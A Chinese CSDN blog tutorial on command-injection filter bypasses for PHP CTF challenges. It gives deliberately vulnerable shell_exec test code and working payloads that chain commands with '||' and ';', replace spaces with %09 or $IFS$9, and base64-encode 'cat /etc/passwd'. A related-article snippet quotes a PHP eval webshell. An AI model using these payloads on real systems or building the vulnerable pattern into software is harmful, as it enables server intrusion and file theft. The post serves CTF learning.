命令执行技巧

最新推荐文章于 2023-06-05 17:35:20 发布
最新推荐文章于 2023-06-05 17:35:20 发布
阅读量3.2k 收藏
点赞数 4
分类专栏: PHP CTF 文章标签: php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52387684/article/details/121644518
版权
CTF 同时被 2 个专栏收录
10 篇文章 0 订阅
订阅专栏
PHP
4 篇文章 0 订阅
订阅专栏

命令执行将执行系统命令,因此利用Linux shell中的特性,从而达到绕过防御的效果

测试代码:

<?php
   highlight_file(__FILE__);
   $name = $_GET['name'];
   $output=shell_exec('echo'.$name);
   echo $output;
   ?>
Linux shell中分隔符
换行符(%0a)、回车符(%0d)、连续命令(;)、管道符(|)、逻辑符号(||、&&)

注意:在使用回车符的时候要加反引号,逻辑符||的时候要保证前面的语句执行错误

例如:

<?php
	highlight_file(__FILE__);
	$ip = $_GET['ip'];
	$output = shell_exec('ping -c 3'.$ip);
	echo '<pre>'.$output.'</pre>';
?>

我们可以构建

?ip=127.0.0.1.a||whoami
Linux shell 中的空格
%09(teb,在PHP环境下)、$IFS$9、${IFS}、$IFS、<>

注:$IFS在linux下表示分隔符,如果不加{}则bash会将IFS解释为一个变量名, 加一个{}就固定了变量名,$IFS$9后面之所以加个$是为了起到截断的作用 ;为什么要用$9呢,因为$9只是当前系统shell进程的第九个参数的持有者,它始终为空字符串。 不仅 $9可以使用,其他的数字也都可以正确绕过。

实验代码:

<?php
    highlight_file(__FILE__);
	$name=$_GET['name'];
	$name=str_replace(' ','',$name);
	$output=shell_exec('echo'.$name);
	echo $output;
?>

payload:

?name=abc;cat%09/etc/passwd
?name=abc;cat$IFS$9/etc/passwd
常用绕过技巧

  1. 重定义变量 绕过命令过滤

    ;a=l;b=s; a a ab

  2. base64编码绕过

    `echo Y2F0IC9ldGMvcGFzc3dk|base64 -d`

南舍QAQ
关注
  • 4
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
命令执行基础知识
土拨鼠挖洞中的博客
10-06 8986
  思维导图   命令执行含义   当应用需要调用一些外部程序去处理内容情况下,就会用到一些执行系统命令的函数,比如php中的system、exec、shell_exec、passthru、popen、popc_popen等,当用户调用这些函数时,将恶意系统命令注入到正常命令中,造成命令执行漏洞; PHP可动态执行PHP代码的有eval, jsp有Runtime、ge...
Linux中使用top命令技巧
09-15
- **COMMAND**:进程执行命令命令行。 **4. top命令的使用格式及参数** - **d**:设定刷新间隔时间。 - **p**:指定监控特定的进程ID。 - **q**:快速刷新,用于高优先级运行。 - **c**:显示完整的命令行。 -...
命令执行
diemozao8175的博客
08-19 438
Commnd Execution 命令执行 因为没有过滤好特殊字符,导致可以执行一些恶意命令,被称作为命令执行 在操作系统中 “ & 、&& 、| 、 || ”都可以作为命令连接符使用 在linux上“ ; ” 可以代替“ | || ” &前面为假,直接执行后面的语句 && 前面为假直接报错,后面语句不执行 ...
Linux命令使用技巧
05-06
* ctrl+c:取消命令执行 * ctrl+d:关闭 Shell * ctrl+shift+鼠标选中+c:复制选中字符 * ctrl+shift+v:粘贴 * ctrl+a:快速移动光标到行首 * ctrl+e:快速移动光标到行尾 * ctrl+u:快速删除当前所在字符之前的...
docker inspect 命令使用技巧
01-09
包括容器的id、创建时间、运行状态、启动参数、目录挂载、网路配置等等。另外,该命令也可以用来查看docker镜像的信息。 官方描述如下: Return low-level information on Docker objects 语法 语法如下: ...
javap命令的使用技巧
08-27
javap 命令是 JDK 自带的一个工具,它可以对代码反编译,也可以查看 Java 编译器生成的字节码,对代码的执行过程进行分析,了解 JVM 内部的工作。javap 命令可以将 class 文件反编译成易于阅读的格式,展示类的结构...
PowerShell中运行CMD命令技巧总结(解决名称冲突和特殊字符等问题)
01-20
您可能知道新的 Windows PowerShell 可以运行任何旧命令。不过有些旧命令的名称或语法可能会产生问题。但这都不是事儿。 麻烦 1:名称冲突 PowerShell 的 cmdlet 别名和旧命令的名称有冲突是个常见的问题。比如说您...
命令执行知识
qq_48829044的博客
06-20 375
命令执行
命令执行
一只破碗
01-11 369
Pan是执行转换的命令行工具 Kitchen是执行作业的命令行工具 他们都独立于spoon之外。 Linux命令格式 pan.sh -option=value Windows命令格式 pan.bat /option:value option列表: version 显示版本信息 file 指定ktr文件(value:文件路径) param 指定参数(value格式:key...
命令执行
m0_55854679的博客
08-10 3647
漏洞原理 部分Web应用程序提供了一些命令执行的操作,例如,想要测试http://www.example.com是否可以正常连接,那么Web应用程序底层就很可能去调用系统操作命令,如果此处没有过滤好用户输入的数据,就很有可能形成系统命令执行漏洞。程序中因为某些功能需要执行系统命令,并通过网页传递参数到后台执行。然而最根本的原因是没有对输入框中的内容进行过滤,导致出现该漏洞,正常情况下输入框只能接收指定类型的数据。 漏洞概述 攻击者通过web应用可以执行系统命令,从而获得敏感信息,进而控制服务器攻击内网。 漏
浅谈命令执行
A_dmin的博客
09-14 2757
浅谈命令执行   随着IT技术的飞速发展,“计算机”的形态多种多样(大型服务器、PC机、智能终端等等,以及运行其上的形形色色的应用),不同角色的人在计算机系统中所扮演的角色各异(开发者、维护者、高级用户、普通用户、管理者等等)。这些场景中,数据甚至指令通常都无法事先固化,需要在运行的过程中动态输入。如果这两者混杂在一块,没有经过良好的组织,就会被黑客加以利用,成为一种典型的攻击方式——命令注入。 ...
命令执行--系统命令
bylfsj的博客
09-26 955
一、利用漏洞获取webshell 漏洞上传,形成一句话木马,利用命令执行获得webshell fputs(fopen("a.php","w"),'<?php eval($_POST["cmd"])?>'); 以防过滤,可以利用ASCII转换,连接执行。 1.要点:要清楚单双引号的区别。 单引号,引号内部的变量不会执行,直接输出。 双引号,会经过编译器解释后执行。 问:你看出来什么...
代码执行命令执行
最新发布
weixin_62707591的博客
06-05 1730
代码执行顾名思义就是将用户输入的内容作为脚本代码进行执行的一类漏洞,此类漏洞影响很大,在权限较大的情况下可以直接接管服务器。
linux中的分号&&和&,|和||说明与用法
qq_30339595的博客
01-03 410
“;”分号用法 方式:command1 ; command2 用;号隔开每个命令, 每个命令按照从左到右的顺序,顺序执行, 彼此之间不关心是否失败, 所有命令都会执行。 “| ”管道符用法 上一条命令的输出,作为下一条命令参数 方式:command1 | command2 Linux所提供的管道符“|”将两个命令隔开,管道符左边命令的输出就会作为管道符右边命令的输入。连续使用管道意味着第一个命令的...
命令执行简介
weixin_47156475的博客
08-11 333
命令执行的原理: 应用有时需要调用一些执行系统命令的函数, 当用户能控制这些函数中的参数时, 就可以将恶意系统命令拼接到正常命令 中,从而造成命令执行攻击,这就是命令执行漏洞。 利用条件: 应用调用执行系统命令的函数 将用户输入作为系统命令的参数拼接到了命令行中 没有对用户输入进行过滤或过滤不严 漏洞分类: 代码层过滤不严 商业应用的一些核心代码封装在二进制文件中,在web应用中通过system函数来调用: system("/bin/program --arg $arg"); 系统的漏洞造成命令注入 bas
任意命令执行
嘻嘻哈哈
01-12 2452
任意命令执行漏洞 1、简介 原理 当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如php中的system、exec、shell_exec等,如果用户可以控制命令执行函数中的参数时,将可以注入恶意系统命令到正常的命令中,造成命令执行漏洞。 利用条件 应用调用执行系统命令的函数 将用户输入作为系统命令的参数拼接到了命令行中 常见的命令拼接符: &&
linux常用命令使用技巧
04-06
Linux常用命令使用技巧: 1. ls命令:用于显示当前目录下的文件和子目录。可使用-l参数显示更详细的信息,-a参数显示隐藏文件和目录。例如:ls -al。 2. cd命令:用于切换当前工作目录。例如:cd /home/user。 3. ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值